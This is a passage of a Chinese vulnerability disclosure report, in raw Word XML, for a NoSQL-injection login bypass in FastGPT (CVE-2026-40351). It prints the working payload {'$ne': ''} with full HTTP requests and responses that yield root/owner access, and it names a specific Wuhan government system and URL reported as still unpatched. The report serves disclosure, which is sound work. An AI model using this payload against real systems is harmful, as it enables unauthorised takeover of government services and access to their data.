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FastGPT 登录接口 NoSQL 注入认证绕过漏洞</w:t>
        <w:br/>
        <w:t>漏洞复现过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CVE-2026-40351　｜　报送单位：CNVD　｜　发现/验证人：indifference108</w:t>
        <w:br/>
        <w:t>首验 2026-10-08　复测 2026-10-12（复测时漏洞仍未修复）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>一、漏洞基本信息</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sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FastGPT 登录接口 NoSQL 注入认证绕过漏洞（CVE-2026-40351）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NoSQL 注入 / 身份认证绕过（CWE-943）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>危险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>高危　CVSS 3.1 评分 9.8（AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>影响软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FastGPT Community Edition &lt; 4.14.9.5（修复于 4.14.9.5）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>受影响系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>武汉市自然资源和规划局「政府信息公开与AI问答系统」</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>系统地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>http://ai.zrzyhcxjs.wuhan.gov.cn:9001（复测时 HTTPS 证书异常，服务以明文 HTTP 暴露在 9001 端口）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>http://ai.zrzyhcxjs.wuhan.gov.cn:9001/api/support/user/account/loginByPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>验证账号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>root（平台初始化超级管理员，登录后身份 memberName=Owner / role=owner / 权限值 4294967295）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目标系统基于开源 FastGPT 构建。其账号密码登录接口 loginByPassword 在服务端将客户端提交的 JSON 请求体直接拼入 MongoDB 查询，且未对 password 字段做运行时类型校验。攻击者将 password 字段由字符串替换为 MongoDB 查询操作符对象（如 {"$ne": ""}），即可使密码比较条件恒真，绕过密码校验，以请求中指定的任意已存在用户名身份登录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>平台初始化账号 root 即团队 Owner（超级管理员）。以 root 注入成功后，服务端返回完整会话令牌（token，长度 289 字符）与全量权限字段，攻击者即可完全控制平台：用户管理、应用编排、知识库、API 密钥等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>三、复现环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>攻击侧：任意可访问互联网的 Python 3 环境（requests 库），无需账号、无需登录目标系统；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目标侧：武汉市自然资源和规划局政府信息公开与AI问答系统（FastGPT 社区版，版本低于 4.14.9.5）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>复现时间：2026-10-08 首次验证，2026-10-12 复测（连续多次结果一致，漏洞未修复）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>四、复现步骤（含请求报文与截图）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤 1：确认目标系统与漏洞接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目标系统为武汉市自然资源和规划局对外提供政务信息公开与 AI 问答服务的 FastGPT 平台。漏洞接口为账号密码登录接口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="283"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST http://ai.zrzyhcxjs.wuhan.gov.cn:9001/api/support/user/account/loginByPassword</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"username": "&lt;用户名&gt;", "password": "&lt;密码&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>正常业务流程下，该接口使用用户名+密码校验身份。以下为验证脚本启动界面，展示目标地址、漏洞接口与注入原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="5901454"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="截图1_验证脚本启动_目标与接口.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="5901454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤 2：对照组请求（不存在的账号 + 注入 payload）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>为避免误报，先发送对照组请求：使用不存在的用户名 root_not_exist_probe 携带同样的注入 payload。服务端返回账号不存在错误（code=503002, statusText=account_psw_error），证明注入未生效时系统行为正常：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="283"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST http://ai.zrzyhcxjs.wuhan.gov.cn:9001/api/support/user/account/loginByPassword HTTP/1.1</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Host: ai.zrzyhcxjs.wuhan.gov.cn:9001</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"username": "root_not_exist_probe", "password": {"$ne": ""}}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 500 Internal Server Error</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json; charset=utf-8</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "code": 503002,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "statusText": "account_psw_error",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "message": "common:code_error.account_error",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "data": null</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤 3：实验组请求（root + 注入 payload）—— 漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>将用户名替换为平台超级管理员 root，密码字段注入 MongoDB 操作符 {"$ne": ""}（语义：密码不等于空串，对任意已存密码恒真）。服务端校验被绕过，返回 HTTP 200 与完整会话令牌，登录身份为 memberName=Owner、role=owner（权限值 4294967295，全量权限）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="283"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST http://ai.zrzyhcxjs.wuhan.gov.cn:9001/api/support/user/account/loginByPassword HTTP/1.1</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Host: ai.zrzyhcxjs.wuhan.gov.cn:9001</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"username": "root", "password": {"$ne": ""}}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json; charset=utf-8</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "code": 200,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "data": {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "user": {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "_id": "6801f3d394bff74c700549eb",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "username": "root",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "team": {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "teamName": "My Team",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "memberName": "Owner",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "role": "owner",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "permission": { "isOwner": true, "value": 4294967295,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "hasManagePer": true, "hasWritePer": true, "hasReadPer": true }</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "token": "eyJhbGciOiJIUzI1NiIs...[令牌已脱敏，长度 289 字符]"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>复现过程截图（验证脚本实际运行输出：对照组返回 503002，实验组返回 200，判定 vulnerable=TRUE）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="5901454"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="截图2_注入请求与判定漏洞存在.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="5901454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>判定结果放大：登录身份 username=root，团队身份 memberName=Owner、role=owner，即任意互联网用户无需任何凭证即可夺取该系统最高权限：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="5901454"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
